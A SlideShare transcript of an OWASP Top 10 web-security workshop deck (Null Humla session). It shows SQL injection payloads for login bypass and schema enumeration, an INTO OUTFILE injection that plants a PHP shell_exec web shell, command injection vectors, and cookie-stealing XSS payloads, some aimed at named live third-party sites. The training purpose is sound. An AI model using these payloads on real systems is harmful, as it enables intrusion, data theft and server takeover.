Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Owasp top 10 web application security hazards - Part 1

960 views

Published on

Mission :- Understand / Learn / Practice OWASP Web Security Vulnerabilities https://www.owasp.org/index.php/Top102013-Top_10 In this session, Attendees will perform hands-on exercises to get a better understanding of the OWASP top ten security threats.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Owasp top 10 web application security hazards - Part 1

  1. 1.   TOP 10 WEB APPLICATION SECURITY HAZARDS @   by Abhinav Sejpal Null - Humla Session
  2. 2. THOUGHT WORKS - BANGALORE
  3. 3.         WHO AM I I' m Next-Gen Exploratory Testy  Student of Information Security field Researcher & Reader in free time Member of Crowd Tester (AKA. Bug bounty Hunter)   Proficient at Functional, Usability , Accessibility & Compatibility Testing Love to develop nasty code  & Hack it :) Works as Quality Analyst at AKA. Bug Wrangler Null Open Security Co mmunity passbrains.com
  4. 4. DISCLAIMER This presentation is intended for educational purpose only and I cannot be held liable for any kind of damages done, whatsoever to your machine, or any other damages.   Don't try this attack on any other system without having context knowledge or permission, this may harm someone directly or indirectly. Feel free to use this presentation for practice or education purpose. ^ I hope - You gotcha ^
  5. 5. ~ WE AREN'T GOING TO DO THIS ~ So, feel free to stop when you have a doubt!  Are you Ready to Rock ???
  6. 6. AGENDA  Why Web Application Security Testing ?  Myths, you'll hear - but Do you believe ?  What is OWASP, what do they provide ?    OWASP Web Top - 10 Publication  How web works ?  Proof of Concept  for Top - 10 attack   Self exploratory exercise on Top - 10  Learn + Hack     Q  &  A
  7. 7.    FOR SOCIAL MEDIA Twitter handle   @  @null0x00 Abhinav_Sejpal Hashtag for this session      # #Nullhumla nullblr
  8. 8. HUMLA MEANS 'ATTACK' IN HINDI                         
  9. 9.  
  10. 10.    
  11. 11. OBJECTIVES FOR THIS SESSION BUILD SECURITY AWARENESS FOR WEB APPLICATION GET TO KNOW ATTACK METHOD OF HACKERS LEARN WAY TO DISCOVER SECURITY VULNERABILITIES LEARN BASIC OF SECURE WEB APPLICATION VIA OWASP TOP 10
  12. 12. WHY WEB APPLICATION SECURITY TESTING?
  13. 13. HERE IS THE ANSWER ! Increases vulnerability to attacks Damage to your reputation and brand value Loss of customer confidence & potential business Disturbance to your online means of revenue collection Legal liability Website downtime, loss of time & resources in mitigating the damage Additional costs and regression testing associated with securing web applications for future attacks And much more! Boom - Isn't it? The average loss reported in the 2007 CSI Computer Crime and Security Survey was $350,424.
  14. 14. COMPROMISED SCENARIO
  15. 15. MYTHS, YOU'LL HEAR - BUT DO YOU BELIEVE?
  16. 16. DON'T BELIEVE IN MYTHS! Secure Socket Layer (SSL / HTTPS) protects my website. Buy this one tool and it will solve all my problems. We don’t have anything worth to be stolen. {Java - Insert Name here} is a secured language. We can't possibly be a target. We never had any data breaches on our organization and we are safe. Our technical team is much smart.  #facepalm We have a firewall setup (WAF) - Nothing to worry! You wish  You're safer on a mobile site as compared to a desktop. Can come up with umpteen more!
  17. 17. SO, DO YOU ALL AGREE  THAT WEB APPLICATION SECURITY IS ESSENTIAL?  
  18. 18. MY OPINION   SECURITY TESTING IS ALWAYS A RACE BETWEEN HACKERS AND THE SECURITY COMPANIES TO GET ONE STEP AHEAD OF EACH OTHER.
  19. 19.  RISK MANAGEMENT  THE WEB WILL NEVER BE 100 PER CENT SECURE, BUT WITH GOOD DUE DILIGENCE, IT CAN BE ONE OF THE SAFEST PLACES ON EARTH TO DO BUSINESS.  AFTER ALL, OUR PRIMARY CONCERN IS SEAMLESS BUSINESS. There we stand ^ Web application Security Ninja's ^
  20. 20. :D WHAT IS OWASP? O verly Wonderful Awesome Super People !
  21. 21. OWASP -THE OPEN WEB APPLICATION SECURITY PROJECT (OWASP) is a 501c3 not for-profit worldwide charitable organization Everyone is free to participate in OWASP and all the materials are available under a free and open software license It provides a free access to community resources and events:  Publications, Articles  Standard  Testing and Training Software  Local Chapters & Mailings List  World-wide conferences 
  22. 22. OWASP ROLE Make application security visible, so that people and organizations can make informed decisions about true application security risk!
  23. 23. What do we mean by OWASP  Top 10 Web Application Security Vulnerabilities ? A list of the 10 most severe security issues f requently occur in web applications. It’s a list of vulnerabilities that require immediate remediation. Existing code should be checked for these vulnerabilities, as these flaws are effectively targeted by attackers. New updates on tithe year (third year sequence).  Strong push to present as a standard
  24. 24. Are we sure that this survey results are trustworthy ? This wiki is not a standard or a policy. It provides a brief description of the vulnerabilities, and methods of This is nothing but   Top ten web application security hazards recommended by OWASP Survey. ^ Myth Involved Here^
  25. 25. prevention. LET'S BEGIN OUR JOURNEY OF  TOP 10 WEB APPLICATION SECURITY HAZARDS  I don't want to showcase top ten - let's start with baby steps 
  26. 26. How Web works ?
  27. 27. HTTP HEADER FLOW
  28. 28.  Tamper Google HTTP request!
  29. 29. I have questions? Does the user input go through any validation at user’s web browser? Does Business Logic verify the user inputs at server side?   If your answer is 'No', then be ready for the 'Nightmare'
  30. 30. Conclusion Modern websites rely on user input for everything. They are basically applications which expect various kinds of inputs coming from users to function a certain way.   ~ Courtesy   ~@makash
  31. 31. Could be Command / SQL statement  I AM THAT BAD INPUT 'INJECTION '  OWASP #A1
  32. 32. WHAT IS SQL ? SQL stands for Structured Query Language. Execute queries against a database Retrieve data from a database Insert new records in a database Delete records from a database In short, All DB operations :)
  33. 33.  USER INPUT? AHA
  34. 34. WHAT IF THIS WORKS? UMM
  35. 35. IT'S ME - SQL INJECTION PEOPLE CALL ME SQLI ALSO 'YES' - I AM A BOTTLENECK FOR DEVELOPERS SINCE MANY YEARS Smart Geeks opt for me along with user inputs &  perform attack.                
  36. 36. PREVIOUS ATTACKS VIA SQLI  SQL injection has been responsible for 83% of all successful hacking-related data breaches, from 2005-2011. (Source: Privacyrights.org) Automation Infects 100,000s: In 2008, SQLi attacks became automated via the use of botnets. Mass website infection incidents include 500,000 reported in 2008; 210,000 in 2009; 500,000 in 2010 and 380,000 in 2011.
  37. 37. SQLI FACTS Dominant Source of Attack: 97 percent of data breaches worldwide are due to SQL injection. (Source: National Fraud Authority UK) Web Application Risk: SQL Injection was the leading Web application risk of 2011. It ranks as one of the most common software vulnerabilities in survey after survey(Source: Trustwave)
  38. 38. CAKE PHP Struts 2 Spring  GWT (Google Web toolkit) MYTHS SQLi is old days' problem - I shouldn't worry about this. ^^ I am using Java / PHP / RUBY / ASP modern days' framework.
  39. 39. ESAPI
  40. 40. Latest SQL Injection Campaign Infects 1 Million Web Pages
  41. 41. Yahoo Hit By SQL Injection Attack
  42. 42. SQL INJECTION FLAW IN WALL STREET JOURNAL DATABASE LED TO BREACH
  43. 43. SQL INJECTION ISN'T GOING ANY WHERE  <3
  44. 44. for: Setup the Test Lab Install XAMPP Acronym X (to be read as "cross", meaning )cross-platform Apache HTTP Server MySQL PHP Perl
  45. 45. TARGETED APPLICATION Client Side language : HTML & Javascript Server side Language: PHP DB : MYSQL  Why PHP ?  - Any answer Here? Why MySQL?  MySQL is  Girlfriend of PHP <3 
  46. 46. PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE. http://w3techs.com/technologies/overview/programming_lang
  47. 47. PHP: 244M SITES 2.1M IP ADDRESSES
  48. 48. 2013 Server-side Programming Language of the Year Don't Mind Power of PHP > Facebook & yahoo  http://w3techs.com/blog/entry/web_technologies_of_the_year
  49. 49. ERROR BASED SQLI Demo http://sqli.cyberwebdeveloper.com/index.php
  50. 50. CONCEPT Basic SQL query Login page :- SELECT * FROM users where username="username" AND password = "pass" Basic PHP statement for Login page :- SELECT * FROM users where username='".$username."' AND password = '".md5($pass)."'"   *Md5() method is used to encrypt the password.        * Demo at SQL *
  51. 51. CHEAT SHEET #Attack  - 1 SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know' Injection code :- admin' or '1'='1
  52. 52. WHY ? Attack 1 is rely on 'User name' SELECT * FROM `users` WHERE `username` =' admin' or '1'='1 ' and password ='I dont know' Can't perform this attack on password field due to encryption. User name = anything' or '1' ='1 password = anything' or '1'='1
  53. 53. * known User name is mandatory Here*
  54. 54. LEARNING FROM THE ATTACK 1 User name is known i.e. 'admin'  Append SQL statement with user name   <It simply works> But you can't perform this attack without user name
  55. 55. COMMENTS BASED SQLI http://dev.mysql.com/doc/refman/5.1/en/comments.html # : Single line comment "-- " : Sequence to end of line comment /*  Sequence to following block comment*/
  56. 56. CONCEPT Basic SQL query Login page :- SELECT * FROM users where username="username" AND password = "pass" What if  - I insert comments in first attack SELECT * FROM users where username=" admin" or '1' ='1' # AND password = "pass" << AND password = " pass" >> doesn't execute all
  57. 57. IF YOU GET ME - ATTACK DOESN'T REQUIRE USER NAME NOW  SELECT * FROM users where username=" admin" or '1' ='1' # AND password = "pass" SQL statement will be always true due  '1' = '1'  thus doesn't matter, you are knowing user name or not. Yes - I am done. but what if ' #' is not valid input?
  58. 58. (-- ) WORKS FOR YOU BUDDY! * --(space) is syntax  admin' or '1' = '1' --: False  admin' or '1' = '1' --  : True Mostly people forget to add space, so I use below vector admin' or '1' = '1' -- space + any one character E.G. > admin' or '1' = '1' -- Sandy
  59. 59. SO, WHAT DO YOU THINK, SQL IS ALL ABOUT   1=1?  ssshhh - Do you hear that? - NO
  60. 60. DUMP SENSITIVE DB INFO * Identify column gets selected. * Identify the data set which value will be displayed. a%' union select 1,2,3,4,5 from users # a%' union select 1 ,@@datadir,2,3,4 from users # a%' union select 1 ,@@version,3,4,5 from users #
  61. 61. DATABASE ENUMERATION   a%' union select 1, table_schema,2,3,4 from information_schema.tables  #
  62. 62. TABLE ENUMERATION a%' union select 1, table_schema, table_name,3,4 from information_schema.tables  # a%' union select 1, table_schema, table_name,3,4 from information_schema.tables  where table_schema='sqlhumla'#
  63. 63.  - Text File Writing SHELL INJECTION Into outfile  I want to save a MySQL query result to a text file like this: <span class="kwd">SELECT</span> <span class="pln"></span> <span class="pun">*</span> <span class="pln"></span> <span class="kwd">FROM</span> <span class="pln"> orders </span> <span class="kwd">INTO</span> <span class="pln"> OUTFILE </span> <span class="str">'/data.txt'</span>
  64. 64. Can we append the same logic with our injection? user=frodo' into outfile 'test.txt'; -- comments
  65. 65. SHELL INJECTION 'Hello world' PHP File Writing at current folder =FRODO' INTO OUTFILE "../../HTDOCS/XAMPP/SQLI/TEST.TXT"; - A Select * from users where username = 'frodo' union select 1,2,3," <?php  echo "Hello World"; ?> ",5 from users into outfile '../../htdocs/xampp/sqli/ shellTest.php';  -- a
  66. 66. PHP SHELL CODE <?php $output = shell_exec('Test'); echo '<pre>$output</pre>'; ?> Append the same as SQL injection user=frodo' union select 1,2,3, " <?php $output = shell_exec('test'); echo '<pre>$output</pre>'; ?>", 5 from users into outfile '../../htdocs/xampp/sqli/shell.php';  -- a
  67. 67. THERE YOU ARE! http://127.0.0.1/xampp/Sqli/shell.php?test=dir    
  68. 68. PLAY GROUND DAMN VULNERABLE WEB APP Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment. http://www.dvwa.co.uk/ https://github.com/RandomStorm/DVWA
  69. 69. COMMAND INJECTION 127.0.0.1 && DIR OWASP #A1
  70. 70. UNDERSTAND THE CODE
  71. 71. ANOTHER VECTOR 1 | DIR C:
  72. 72. BAD CODE WITH SUBSTITUTIONS
  73. 73. AUTOMATION TOOLS / FRAMEWORK FOR POC Metasploit SQL MAP Havij Sql inject Me(add-on) Burp suit  SQL Inject  or many....!
  74. 74. XXS CROSS-SITE SCRIPTING "XSS enables attackers to inject client-side script into web pages viewed by other users". OWASP #A3 Wikipedia says
  75. 75. WHAT IS XSS ? http://appsandsecurity.blogsplot.de/2012/11/is-xss-solved.html OWASP says "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
  76. 76. SO WHERE DOES XSS STAND? ACCORDING TO WHITE HAT,  53% WEB APPLICATIONS HAVE XSS VULNERABILITY.  https://www.whitehatsec.com/assets/WPstatsReport_052013.p
  77. 77. DO YOU KNOW, 81 OUT OF 100 POPULAR MOBILE WEBSITES ARE VULNERABLE TO XSS? http://www.nds.rub.de/media/nds/veroeffentlichungen/2013/08
  78. 78. STATS FROM GOOGLE'S VULNERABILITY REWARD PROGRAM http://www.nilsjuenemann.de/2012/12/news-about- googles-vulnerability-reward.html
  79. 79. INPUT - OUTPUT CONTEXT
  80. 80. http://slides.com/mscasharjaved/on-breaking-php-based-cross-site-scripting-protections-in-the-wild#/61
  81. 81. http://slides.com/mscasharjaved/on-breaking-php-based-cross-site-scripting-protections-in-the-wild#/63
  82. 82. LIFE CYCLE OF REFLECTED XSS
  83. 83. AND I'M YOUR XSS! </script> <script> confirm(1); </script>
  84. 84. LIVE http://tvfortesters.com/?s="><script> alert(document.cookie); </script>    I f you get me, it is Reflected XSS
  85. 85. Challenge #1 http://demo.testfire.net/ Copyright © 2014, IBM Corporation
  86. 86. (AKA NON-PERSISTENT)REFLECTED XSS Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data. https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
  87. 87. CAN WE SAVE JS CODE IN DB? What if so ? :D      
  88. 88. LIFE CYCLE OF STORED XSS
  89. 89.  I T IS STORED XSS Live  http://mmqb.si.com/2014/08/20/san-francisco-49ers-new-stadium-training-camp-thoughts- peter-king-video/#mmqb_livefyre_comm_bellow/autostart/ Vector :  Under BIO :- </p></script> <img src=1 onerror=alert(document.cookie);>
  90. 90. STORED XSS Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application.
  91. 91. #XSS WRITE-UP BY ASHAR http://www.scribd.com/doc/210121412/XSS-is-not-going- anywhere
  92. 92. OH NO, THERE IS AN XSS IN YOUR JS http://127.0.0.1/xampp/DOM%20XSS/domxss_demo_1.html# <img src=nonexistent onerror=alert(1)>
  93. 93. IT'S DOM BASED XSS Directory Object Model
  94. 94. Understand the Logic When Source gets synced?    An attacker may append a JS to the affected page URL which would, when executed, display the alert box. Impact would show only on - Client side JS
  95. 95.  IF YOU WANT TO KNOW MORE ABOUT DOM BASED XSS THEN  PLEASE BUG " "@LAVAKUMARK More Info at : https://ironwasp.org/
  96. 96. <shhh - Very low priority but should be acknowledged > NO MORE TALK ABOUT SELF XSS
  97. 97. But there is a lot to learn :D
  98. 98. Am I Vulnerable To 'Broken Authentication   & Session Management'? A2 - OWASP TOP 10
  99. 99. So, Let's Learn about Web App DB structure Passwords are stored in plain text. oh really  -- ':( OWASP #A6
  100. 100. Password is protected, when stored using encryption algorithm.   Are you sure?  http://www.md5online.org/
  101. 101. YOU MAY ALSO TRY OUT HASH BUT PASSWORD SALT IS A RECOMMENDED SOLUTION SO FAR. P ASSWORD POLICY SHOULD BE APPLIED NICELY AND SHOULD NOT BE WEAKER. -- * -- SECURITY & BUSINESS LOGIC SHOULD BE APPLIED FOR CHANGING PASSWORD.  CHANGE PASSWORD DOESN'T ASK FOR CURRENT PASSWORD - LOL 
  102. 102. IN-SECURED SESSION-ID Cookies Flag HTTP ONLY  Secure flag would be complimentary 
  103. 103. TAKE AWAY 
  104. 104. AVOIDING INSECURE DIRECT OBJECT REFERENCES OWASP #A4  
  105. 105.  URLS' PATTERN
  106. 106. Demo  #1 Tamper the ID parameter http://127.0.0.1/xampp/sqli/secondorder_changepass.php
  107. 107. ENUMERATION USING PARAMETER LIVE https://profile.utest.com/67797 https://profile.utest.com/200 -- N
  108. 108. MISSING FUNCTION LEVEL ACCESS CONTROL OWASP #A7
  109. 109. CONCEPT 
  110. 110. LIVE HTTP://STEPINFORUM.ORG/MAILERS2014/ http://demo.testfire.net/pr/
  111. 111. Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure- Libraries.pdf
  112. 112. USING KNOWN VULNERABLE COMPONENTS  OWASP #A9
  113. 113. ~ PROTECTION AGAINST ~
  114. 114. A6 – Sensitive Data Exposure
  115. 115. BASIC UNDERSTANDING
  116. 116. HTTP://SLIDES.COM/ABHINAVSEJPAL/TOP-10-WEB-APPLICATION-SECURITY-HAZARDS#/89
  117. 117. OWASP #A8 – Avoiding CSRF Flaws
  118. 118. CSRF 
  119. 119. CSRF DEMO
  120. 120. UNDERSTAND CSRF FIX
  121. 121. SECURITY MISCONFIGURATION
  122. 122. OWASP -#A5 
  123. 123.            if you are planning to host your own server  this talk matters for you  "SECURING A LINUX WEB SERVER IN 10 STEP S" BY   A KASH MAHAJAN  https://www.youtube.com/watch?v=ort9qxzu3h0
  124. 124. YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com
  125. 125. GOOD READS https://www.owasp.org/ http://ha.ckers.org http://hakipedia.com http://www.fiddlerontheroot.com http://www.garage4hackers.com http://www.computersecuritystudent.com/ -- Explore Google Darling > Search  'OWASP  TOP Ten' --
  126. 126. WE NEED YOU! Attend Null Meets-up & give presentations. Share your ideas & leanings. Talk to our community champions & gain from leanings. Your feedback helps us to build a good community. Looking forward to your ongoing support. HTTP://NULL.CO.IN/ Say 'Hello' @null0x00
  127. 127. - Twitter Folks - @ , @ , @ @ , @ , @     @ ,  #Nullblr Leads & Champions Big thank you to @ ,@   & you All. CREDITS riyazwalikar anantshri makash TroyHunt yog3sharma soaj1664ashar @ MohammedAImran ru94mb @ LAVAKUMARK , @1_NEHA null0x00 JubbaOnJeans
  128. 128. THANK YOU!  KEEP THE SECURITY ANTE UP.
  129. 129. https://slides.com/abhinavsejpal/top-10-web-application- security-hazards  LICENSE AND COPYRIGHTS Copyrights 2013-2014 Abhinav Sejpal -----   ( CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported  Dedicated to my lovely daddy

×